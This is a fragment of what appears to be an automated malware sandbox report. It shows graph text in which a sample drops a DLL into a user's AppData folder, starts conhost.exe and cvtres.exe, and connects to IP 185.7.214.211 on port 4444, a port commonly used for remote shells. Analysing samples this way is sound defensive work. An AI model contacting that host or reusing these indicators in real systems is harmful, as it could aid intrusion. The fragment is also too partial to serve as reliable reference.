machines) 12->55 31 C:\Users\user\AppData\Local\...\p5qmaywt.dll, PE32 15->31 dropped 21 conhost.exe 15->21         started        23 cvtres.exe 1 15->23         started        37 185.7.214.211, 4444, 49714 DELUNETDE France 18->37 file9 signatures10 process11

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.